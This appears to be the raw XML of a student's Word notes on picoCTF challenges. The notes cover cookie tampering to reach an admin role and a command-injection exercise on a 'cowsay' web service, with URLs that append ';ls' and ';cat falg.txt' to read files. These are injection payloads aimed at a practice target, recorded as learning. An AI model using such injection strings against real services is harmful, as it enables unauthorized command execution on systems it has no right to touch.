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9D779" w14:textId="4978A143" w:rsidR="00AB6D92" w:rsidRDefault="00D513ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="1B1B1B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1B1B1B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Most cookies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C354D5" w14:textId="59ACD120" w:rsidR="00004352" w:rsidRDefault="00004352">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E954D35" wp14:editId="5986ED24">
            <wp:extent cx="5731510" cy="2262505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="1869280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39643" w14:textId="0DCE2BAA" w:rsidR="00D513ED" w:rsidRDefault="00D513ED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="396DD108" wp14:editId="1DDA074D">
            <wp:extent cx="5731510" cy="2806700"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1466807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078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0B3C" w14:textId="1D5D0B48" w:rsidR="00D513ED" w:rsidRDefault="00D513ED">
      <w:r>
        <w:t>I was able to get the cookie  from inspecting . it was also clear “very auth “ had to changed to admin but was not able to get the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5F592F" w14:textId="77777777" w:rsidR="00D513ED" w:rsidRDefault="00D513ED"/>
    <w:p w14:paraId="5EE11D8E" w14:textId="77777777" w:rsidR="00D513ED" w:rsidRDefault="00D513ED"/>
    <w:p w14:paraId="6057924E" w14:textId="77777777" w:rsidR="00D513ED" w:rsidRDefault="00D513ED"/>
    <w:p w14:paraId="52F3BDC6" w14:textId="77777777" w:rsidR="00D513ED" w:rsidRDefault="00D513ED"/>
    <w:p w14:paraId="63342B5A" w14:textId="6ED8677F" w:rsidR="00D513ED" w:rsidRDefault="00D513ED">
      <w:r>
        <w:t>Caas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D01C86A" w14:textId="4139AE1D" w:rsidR="00D513ED" w:rsidRDefault="00D513ED">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00363B9B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://caas.mars.picoctf.net/cowsay/hello</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6473B6BF" w14:textId="434FD3CE" w:rsidR="00D513ED" w:rsidRDefault="00D513ED">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00363B9B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://caas.mars.picoctf.net/cowsay/hello;ls</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22909635" w14:textId="213AF1E9" w:rsidR="00D513ED" w:rsidRDefault="00D513ED">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00363B9B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://caas.mars.picoctf.net/cowsay/hello;cat%20falg.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F5292A9" w14:textId="35C3B88F" w:rsidR="00D513ED" w:rsidRDefault="00D513ED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="308C2735" wp14:editId="01F7D226">
            <wp:extent cx="5731510" cy="2511425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="901762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623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9244" w14:textId="7ECBD79D" w:rsidR="00D513ED" w:rsidRDefault="00D513ED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D1BADC6" wp14:editId="5E9E966A">
            <wp:extent cx="5731510" cy="2823210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="156843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312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C8"/>
    <w:rsid w:val="00004352"/>
    <w:rsid w:val="00225195"/>
    <w:rsid w:val="008A1C98"/>
    <w:rsid w:val="00AB6D92"/>
    <w:rsid w:val="00D513ED"/>
    <w:rsid w:val="00EB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9B611"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9BBF9C7C-F1E3-4514-B724-11604987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13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as.mars.picoctf.net/cowsay/hello;cat%20falg.t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aas.mars.picoctf.net/cowsay/hello;l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as.mars.picoctf.net/cowsay/hello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Lakshit Tandon</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lakshit Tandon</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-10T12:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-10T17:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>